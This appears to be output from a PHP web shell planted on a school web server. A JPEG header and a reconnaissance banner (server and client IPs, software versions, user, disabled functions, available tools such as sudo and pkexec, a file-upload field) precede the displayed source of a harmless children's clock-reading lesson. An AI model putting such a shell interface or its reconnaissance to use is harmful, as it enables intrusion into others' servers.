????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.133.59.209 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old3/Html/LevelC/Category2/ |
Upload File : |
<!DOCTYPE html> <html> <head> <title>Fill in the numbers and minutes</title> <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script> <script> function page_preLoad() { shared_setDeviceTypeLevelCategoryLastLesson(Level.C, Category.No2); shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta'); shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.C, Category.No2, 9), true, true); shared_setFooterTable('id_tblFooter', true, true, true, true, true); var ids_headings = ['id_td_heading1']; var ids_boxes = ['id_dropBox_smallCircle1', 'id_dropBox_smallCircle2', 'id_dropBox_smallCircle3', 'id_dropBox_smallCircle4', 'id_dropBox_smallCircle5', 'id_dropBox_smallCircle6', 'id_dropBox_smallCircle7', 'id_dropBox_smallCircle8', 'id_dropBox_smallCircle9', 'id_dropBox_smallCircle10', 'id_dropBox_smallCircle11', 'id_dropBox_smallCircle12']; var ids_options = ['id_td_no1', 'id_td_no2', 'id_td_no3', 'id_td_no4', 'id_td_no5', 'id_td_no6', 'id_td_no7', 'id_td_no8', 'id_td_no9', 'id_td_no10', 'id_td_no11', 'id_td_no12']; var ids_spans = ['id_span_no1', 'id_span_no2', 'id_span_no3', 'id_span_no4', 'id_span_no5', 'id_span_no6', 'id_span_no7', 'id_span_no8', 'id_span_no9', 'id_span_no10', 'id_span_no11', 'id_span_no12']; var ids_All = ids_headings.concat(ids_boxes); shared_adjust_fontSize_for_ids_all_devices(ids_All, 80); shared_adjust_fontSize_for_ids_all_devices(ids_options, 120); shared_init_dropBox_tds_withOUT_drag_here(ids_boxes); shared_init_dropping_spans(ids_spans); var id_tables_array = ['id_table1']; shared_border_collapse_for_tables_for_all(id_tables_array); var id_tables_array = ['id_table2']; shared_border_collapse_for_tables_except_android(id_tables_array); } function page_onLoad() { addCanvasedMinutesLines(''); loadClock('id_td1', true, 'center', ''); } function addCanvasedMinutesLines() { var divInnerHtml = ''; for (var nthLine = 1; nthLine <= 60; nthLine++) { if ((nthLine % 5) != 0) { var id_canvas = 'id_minutesLine' + nthLine; divInnerHtml += '<canvas id="' + id_canvas + '" style="position:absolute" onClick="click_canvasMinuteLine(\'' + id_canvas + '\')"></canvas>'; } } var id_minutesLines = 'id_divMinutesLines'; document.getElementById(id_minutesLines).innerHTML = divInnerHtml; } function click_canvasMinuteLine(id_canvas) { var eCanvas = document.getElementById(id_canvas); if (eCanvas.isHiddenLine) { var eCanvasContext = eCanvas.getContext("2d"); eCanvasContext.moveTo(eCanvas.width * 0.1, eCanvas.height / 2.0); eCanvasContext.lineTo(eCanvas.width * 0.9, eCanvas.height / 2.0); eCanvasContext.strokeStyle = 'blue'; eCanvasContext.lineWidth = (shared_currentDeviceOS == shared_deviceOS_Android) ? 4 : 2; eCanvasContext.stroke(); eCanvas.isHiddenLine = false; } } function btnHome_click() { shared_btnHomeCategories_click('LevelC'); } function btnPrevious_click() { window.location = 'LevelCCat2Lesson8.html'; } function btnNext_click() { window.location = 'LevelCCat2Lesson10.html'; } function getPoint(pFromPoint, angleInDeg, distance) { var returnPoint = new Point(); var pi = 3.142857; var angleInRad = angleInDeg * pi / 180.0; returnPoint.x = pFromPoint.x + distance * Math.cos(angleInRad); returnPoint.y = pFromPoint.y + distance * Math.sin(angleInRad); return (returnPoint); } function loadClock(id_td, isCirclesRequired, circlesPosition) { var eTd = document.getElementById(id_td); var eTdRectangle = eTd.getBoundingClientRect(); var widthTd = eTdRectangle.width; var heightTd = eTdRectangle.height; var bigCircleSquareWidthHeight = Math.min(widthTd, heightTd); //bigCircleSquareWidthHeight *= 0.85;//Original //Newly added if (shared_currentDeviceOS == shared_deviceOS_Android) { bigCircleSquareWidthHeight *= 0.95; } else { bigCircleSquareWidthHeight *= 0.84;//0.88 } var canvasSmallCircleToBorderGap = 2.0; var bigCircleCanvasWidthOrHeightHalf = bigCircleSquareWidthHeight / 2.0; var bigCircleRadius = bigCircleCanvasWidthOrHeightHalf - 5.0; var smallCircleCanvasWidthHeight = (bigCircleCanvasWidthOrHeightHalf / 5.4); var smallCirclesRadius = (smallCircleCanvasWidthHeight / 2.0) - canvasSmallCircleToBorderGap; var nCircles = 12; var angleCircleToCircle = 360.0 / nCircles; var minutesLineBoxWidth = smallCircleCanvasWidthHeight / 2.2; var minutesLineBoxHeight = smallCircleCanvasWidthHeight / 2.2; var minutesLineLength = minutesLineBoxHeight; var eHeader = document.getElementById('id_tblHeader'); var centerPoint = new Point((widthTd / 2.0) + eTdRectangle.left, (heightTd / 2.0) + eTdRectangle.top); var angleInDeg = -60; var distance = bigCircleRadius - (smallCircleCanvasWidthHeight / 2.0); var idBigCircle = 'id_bigCircle'; var eBigCircle = document.getElementById(idBigCircle); eBigCircle.width = bigCircleSquareWidthHeight; eBigCircle.height = bigCircleSquareWidthHeight; eBigCircle.style.left = (centerPoint.x - bigCircleCanvasWidthOrHeightHalf)+ 'px'; eBigCircle.style.top = (centerPoint.y - bigCircleCanvasWidthOrHeightHalf)+ 'px'; //eBigCircle.style.position = centerPoint; eBigCircle.style.backgroundColor = shared_colorOlive; setBigCircleInfo(idBigCircle, bigCircleCanvasWidthOrHeightHalf, bigCircleCanvasWidthOrHeightHalf, bigCircleRadius); var number = 3; for (var nthCanvas = 1; nthCanvas <= nCircles; nthCanvas++) { var point = getPoint(centerPoint, angleInDeg, distance); var idCanvas = 'id_dropBox_smallCircle' + nthCanvas; var eSmallCircle = document.getElementById(idCanvas); eSmallCircle.width = smallCircleCanvasWidthHeight; eSmallCircle.height = smallCircleCanvasWidthHeight; eSmallCircle.style.left = (point.x - (smallCircleCanvasWidthHeight / 2.0)) + 'px'; eSmallCircle.style.top = (point.y - (smallCircleCanvasWidthHeight / 2.0)) + 'px'; eSmallCircle.circlesRadius = smallCirclesRadius; setSmallCircleInfo(idCanvas, smallCirclesRadius, canvasSmallCircleToBorderGap, isCirclesRequired, number); if (!(isCirclesRequired)) { number++; if (number > nCircles) { number = 1; } } angleInDeg += angleCircleToCircle; } var minutesLinesAngleInDeg = 6; var minutesLinesDistance = distance * 1.01; for (var nthCanvas = 1; nthCanvas <= 60; nthCanvas++) { if ((nthCanvas % 5) != 0) { var point = getPoint(centerPoint, minutesLinesAngleInDeg, minutesLinesDistance); var idCanvas = 'id_minutesLine' + nthCanvas; var eMinutesLine = document.getElementById(idCanvas); eMinutesLine.width = minutesLineBoxWidth; eMinutesLine.height = minutesLineBoxHeight; eMinutesLine.style.left = (point.x - (minutesLineBoxWidth / 2.0)) + 'px'; eMinutesLine.style.top = (point.y - (minutesLineBoxHeight / 2.0)) + 'px'; //eMinutesLine.style.backgroundColor = 'orange'; setMinutesLineInfo(idCanvas, minutesLinesAngleInDeg); } minutesLinesAngleInDeg += 6; } var dotCircleDia = smallCirclesRadius / 2.5; var dotCircleRadius = dotCircleDia / 2.0; var idDotCircle = 'id_dotCircle'; var eDotCircle = document.getElementById(idDotCircle); eDotCircle.width = dotCircleDia + 2; eDotCircle.height = dotCircleDia + 2; eDotCircle.style.left = (centerPoint.x - dotCircleRadius - 1) + 'px'; eDotCircle.style.top = (centerPoint.y - dotCircleRadius - 1) + 'px'; setDotCircleInfo(idDotCircle, dotCircleRadius, dotCircleRadius, dotCircleRadius); } function setBigCircleInfo(id_circle, positionX, positionY, circlesRadius) { var eDropBoxBigCircle = document.getElementById(id_circle); var eDropBoxBigCircleContext = eDropBoxBigCircle.getContext("2d"); eDropBoxBigCircleContext.beginPath(); eDropBoxBigCircleContext.arc(positionX, positionY, circlesRadius, 0, 2*Math.PI); eDropBoxBigCircleContext.stroke(); eDropBoxBigCircleContext.fillStyle = '#F2F2F2';//Light gray eDropBoxBigCircleContext.fill(); } function setSmallCircleInfo(id_circle, circlesRadius, canvasSmallCircleToBorderGap, isCirclesRequired, number) { var eDropBoxSmallCircle = document.getElementById(id_circle); var eDropBoxSmallCircleContext = eDropBoxSmallCircle.getContext("2d"); eDropBoxSmallCircleContext.beginPath(); if (isCirclesRequired) { eDropBoxSmallCircleContext.arc(circlesRadius + canvasSmallCircleToBorderGap, circlesRadius + canvasSmallCircleToBorderGap, circlesRadius , 0, 2*Math.PI); eDropBoxSmallCircleContext.strokeStyle = 'black'; eDropBoxSmallCircleContext.stroke(); eDropBoxSmallCircleContext.fillStyle = '#F2F2F2';//Light gray eDropBoxSmallCircleContext.fill(); } else { var xPosition = number < 10 ? (circlesRadius * 1.15) : circlesRadius; eDropBoxSmallCircleContext.font = circlesRadius + 'px Arial Rounded MT Bold'; eDropBoxSmallCircleContext.fillStyle = 'black'; eDropBoxSmallCircleContext.textAlign = 'center'; eDropBoxSmallCircleContext.textBaseline = 'middle'; eDropBoxSmallCircleContext.fillText(number, xPosition, circlesRadius); } } function setDotCircleInfo(id_circle, positionX, positionY, circlesRadius) { var eDropBoxDotCircle = document.getElementById(id_circle); var eDropBoxDotContext = eDropBoxDotCircle.getContext("2d"); eDropBoxDotContext.beginPath(); eDropBoxDotContext.arc(positionX + 1, positionY + 1, circlesRadius, 0, 2*Math.PI); eDropBoxDotContext.fillStyle = 'black'; eDropBoxDotContext.fill(); } function setMinutesLineInfo(id_MinutesLine, angle) { var eMinutesLine = document.getElementById(id_MinutesLine); eMinutesLine.isHiddenLine = true; var width = eMinutesLine.width; var height = eMinutesLine.height; var eMinutesLineContext = eMinutesLine.getContext("2d"); eMinutesLineContext.translate(width / 2.0, height / 2.0); eMinutesLineContext.rotate(angle * (Math.PI / 180.0)); eMinutesLineContext.translate(- width / 2.0, - height / 2.0); } function DragDrop(id_dropBox, ids_array) { if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array)) { var eCurrentDropped = document.getElementById(shared_currentDropingId); var eDropBoxCircle = document.getElementById(id_dropBox); var circlesRadius = eDropBoxCircle.circlesRadius; var xPosition = eCurrentDropped.innerText.valueOf() < 10 ? (circlesRadius * 1.15) : circlesRadius; var eDropBoxContext = eDropBoxCircle.getContext("2d"); eDropBoxContext.strokeStyle = 'black'; eDropBoxContext.stroke(); eDropBoxContext.fillStyle = shared_colorLightGreen; eDropBoxContext.fill(); eDropBoxContext.beginPath(); eDropBoxContext.font = circlesRadius + 'px Arial Rounded MT Bold'; eDropBoxContext.fillStyle = 'black'; eDropBoxContext.textAlign = 'center'; eDropBoxContext.textBaseline = 'middle'; eDropBoxContext.fillText(eCurrentDropped.innerText, xPosition, circlesRadius); eCurrentDropped.innerText = ''; eCurrentDropped.hidden = true; eCurrentDropped.isMoved = true;//Newly added 0n 17-jul-2014 shared_set_currentDropingId_draggbleToFalse(); } else { shared_resetCurrentDroppingPosition(id_dropBox); } } function btnValidate_click() { var nMinuteLinesVisible = getMinuteLinesVisible(); var ids_boxes = ['id_dropBox_smallCircle1', 'id_dropBox_smallCircle2', 'id_dropBox_smallCircle3', 'id_dropBox_smallCircle4', 'id_dropBox_smallCircle5', 'id_dropBox_smallCircle6', 'id_dropBox_smallCircle7', 'id_dropBox_smallCircle8', 'id_dropBox_smallCircle9', 'id_dropBox_smallCircle10', 'id_dropBox_smallCircle11', 'id_dropBox_smallCircle12']; var isAllBoxesFilled = shared_isAllInfosFilled(ids_boxes); if (nMinuteLinesVisible == 48 && isAllBoxesFilled) { shared_show_claps_animation('shared_id_div_claps_image'); } } function getMinuteLinesVisible() { var nMinuteLines = 0; for (var nthLine = 1; nthLine <= 60; nthLine++) { if ((nthLine % 5) != 0) { var id_minutesLine = 'id_minutesLine' + nthLine; var eMinutesLine = document.getElementById(id_minutesLine); if (eMinutesLine.isHiddenLine == false) { nMinuteLines++; } } } return (nMinuteLines); } </script> </head> <body onload="page_onLoad()"> <div id="shared_id_div_claps_image"> </div> <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0"> <tr height="5%"> <td> <header height="100%"> <div id="id_tblHeader" align="center"></div> </header> </td> </tr> <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device --> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="2%"> <tr> <td align="center"> <table id="id_table1" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="5%"> <td id="id_td_heading1" class="shared_style_options_blue_24px_bold"> <span>Fill the numbers and minutes</span> </td> </tr> <tr height="*"> <td style="border-right: none; border-bottom: none"> <table width="100%" height="100%" border="0" cellspacing="2%" cellpadding="0"> <tr height="100%"> <td> <table id="id_table2" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="5%"> <td style="border-bottom: none"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td_no1" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_no1" class="cls_drag_no1">1</span> </td> <td id="id_td_no2" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_no2" class="cls_drag_no2">2</span> </td> <td id="id_td_no3" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_no3" class="cls_drag_no3">3</span> </td> <td id="id_td_no4" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_no4" class="cls_drag_no4">4</span> </td> <td id="id_td_no5" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_no5" class="cls_drag_no5">5</span> </td> <td id="id_td_no6" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_no6" class="cls_drag_no6">6</span> </td> <td id="id_td_no7" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_no7" class="cls_drag_no7">7</span> </td> <td id="id_td_no8" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_no8" class="cls_drag_no8">8</span> </td> <td id="id_td_no9" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_no9" class="cls_drag_no9">9</span> </td> <td id="id_td_no10" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_no10" class="cls_drag_no10">10</span> </td> <td id="id_td_no11" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_no11" class="cls_drag_no11">11</span> </td> <td id="id_td_no12" class="shared_style_red_24px_bold" width="*" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_no12" class="cls_drag_no12">12</span> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="90%"> <td id="id_td1" height="10%" align="center" style="border-top: none"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="12%"> <td align="center" valign="top" style="border-left: none; border-right: none; border-bottom: none"> <img id="id_img" src="../../../img/LevelC/Category2/LevelCCat2Lesson7/arrows.png" width="30%" height="auto"> </td> </tr> <tr height="*"> <td align="center" style="border:none"> </td> </tr> </table> <canvas id="id_bigCircle" style="position:absolute"></canvas> <canvas id="id_dotCircle" style="position:absolute"></canvas> <canvas id="id_dropBox_smallCircle1" style="position:absolute" ondragover="shared_highlight('id_dropBox_smallCircle1'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropBox_smallCircle1')" ondrop="DragDrop('id_dropBox_smallCircle1', ['id_span_no1'])"></canvas> <canvas id="id_dropBox_smallCircle2" style="position:absolute" ondragover="shared_highlight('id_dropBox_smallCircle2'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropBox_smallCircle2')" ondrop="DragDrop('id_dropBox_smallCircle2', ['id_span_no2'])"></canvas> <canvas id="id_dropBox_smallCircle3" style="position:absolute" ondragover="shared_highlight('id_dropBox_smallCircle3'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropBox_smallCircle3')" ondrop="DragDrop('id_dropBox_smallCircle3', ['id_span_no3'])"></canvas> <canvas id="id_dropBox_smallCircle4" style="position:absolute" ondragover="shared_highlight('id_dropBox_smallCircle4'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropBox_smallCircle4')" ondrop="DragDrop('id_dropBox_smallCircle4', ['id_span_no4'])"></canvas> <canvas id="id_dropBox_smallCircle5" style="position:absolute" ondragover="shared_highlight('id_dropBox_smallCircle5'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropBox_smallCircle5')" ondrop="DragDrop('id_dropBox_smallCircle5', ['id_span_no5'])"></canvas> <canvas id="id_dropBox_smallCircle6" style="position:absolute" ondragover="shared_highlight('id_dropBox_smallCircle6'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropBox_smallCircle6')" ondrop="DragDrop('id_dropBox_smallCircle6', ['id_span_no6'])"></canvas> <canvas id="id_dropBox_smallCircle7" style="position:absolute" ondragover="shared_highlight('id_dropBox_smallCircle7'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropBox_smallCircle7')" ondrop="DragDrop('id_dropBox_smallCircle7', ['id_span_no7'])"></canvas> <canvas id="id_dropBox_smallCircle8" style="position:absolute" ondragover="shared_highlight('id_dropBox_smallCircle8'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropBox_smallCircle8')" ondrop="DragDrop('id_dropBox_smallCircle8', ['id_span_no8'])"></canvas> <canvas id="id_dropBox_smallCircle9" style="position:absolute" ondragover="shared_highlight('id_dropBox_smallCircle9'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropBox_smallCircle9')" ondrop="DragDrop('id_dropBox_smallCircle9', ['id_span_no9'])"></canvas> <canvas id="id_dropBox_smallCircle10" style="position:absolute" ondragover="shared_highlight('id_dropBox_smallCircle10'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropBox_smallCircle10')" ondrop="DragDrop('id_dropBox_smallCircle10', ['id_span_no10'])"></canvas> <canvas id="id_dropBox_smallCircle11" style="position:absolute" ondragover="shared_highlight('id_dropBox_smallCircle11'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropBox_smallCircle11')" ondrop="DragDrop('id_dropBox_smallCircle11', ['id_span_no11'])"></canvas> <canvas id="id_dropBox_smallCircle12" style="position:absolute" ondragover="shared_highlight('id_dropBox_smallCircle12'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropBox_smallCircle12')" ondrop="DragDrop('id_dropBox_smallCircle12', ['id_span_no12'])"></canvas> <div id="id_divMinutesLines"></div> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="5%"> <td> <footer height="100%"> <div id="id_tblFooter" align="center"></div> </footer> </td> </tr> </table> <script> page_preLoad(); new webkit_draggable('id_span_no1', {handle : 'id_td_no1', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_no2', {handle : 'id_td_no2', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_no3', {handle : 'id_td_no3', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_no4', {handle : 'id_td_no4', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_no5', {handle : 'id_td_no5', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_no6', {handle : 'id_td_no6', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_no7', {handle : 'id_td_no7', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_no8', {handle : 'id_td_no8', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_no9', {handle : 'id_td_no9', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_no10', {handle : 'id_td_no10', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_no11', {handle : 'id_td_no11', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_no12', {handle : 'id_td_no12', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); webkit_drop.add('id_dropBox_smallCircle1', {onOver : function(){shared_highlight('id_dropBox_smallCircle1')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle1')}, onDrop : function(){DragDrop('id_dropBox_smallCircle1', ['id_span_no1'])}}); webkit_drop.add('id_dropBox_smallCircle2', {onOver : function(){shared_highlight('id_dropBox_smallCircle2')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle2')}, onDrop : function(){DragDrop('id_dropBox_smallCircle2', ['id_span_no2'])}}); webkit_drop.add('id_dropBox_smallCircle3', {onOver : function(){shared_highlight('id_dropBox_smallCircle3')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle3')}, onDrop : function(){DragDrop('id_dropBox_smallCircle3', ['id_span_no3'])}}); webkit_drop.add('id_dropBox_smallCircle4', {onOver : function(){shared_highlight('id_dropBox_smallCircle4')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle4')}, onDrop : function(){DragDrop('id_dropBox_smallCircle4', ['id_span_no4'])}}); webkit_drop.add('id_dropBox_smallCircle5', {onOver : function(){shared_highlight('id_dropBox_smallCircle5')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle5')}, onDrop : function(){DragDrop('id_dropBox_smallCircle5', ['id_span_no5'])}}); webkit_drop.add('id_dropBox_smallCircle6', {onOver : function(){shared_highlight('id_dropBox_smallCircle6')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle6')}, onDrop : function(){DragDrop('id_dropBox_smallCircle6', ['id_span_no6'])}}); webkit_drop.add('id_dropBox_smallCircle7', {onOver : function(){shared_highlight('id_dropBox_smallCircle7')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle7')}, onDrop : function(){DragDrop('id_dropBox_smallCircle7', ['id_span_no7'])}}); webkit_drop.add('id_dropBox_smallCircle8', {onOver : function(){shared_highlight('id_dropBox_smallCircle8')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle8')}, onDrop : function(){DragDrop('id_dropBox_smallCircle8', ['id_span_no8'])}}); webkit_drop.add('id_dropBox_smallCircle9', {onOver : function(){shared_highlight('id_dropBox_smallCircle9')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle9')}, onDrop : function(){DragDrop('id_dropBox_smallCircle9', ['id_span_no9'])}}); webkit_drop.add('id_dropBox_smallCircle10', {onOver : function(){shared_highlight('id_dropBox_smallCircle10')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle10')}, onDrop : function(){DragDrop('id_dropBox_smallCircle10', ['id_span_no10'])}}); webkit_drop.add('id_dropBox_smallCircle11', {onOver : function(){shared_highlight('id_dropBox_smallCircle11')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle11')}, onDrop : function(){DragDrop('id_dropBox_smallCircle11', ['id_span_no11'])}}); webkit_drop.add('id_dropBox_smallCircle12', {onOver : function(){shared_highlight('id_dropBox_smallCircle12')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle12')}, onDrop : function(){DragDrop('id_dropBox_smallCircle12', ['id_span_no12'])}}); </script> </body> </html>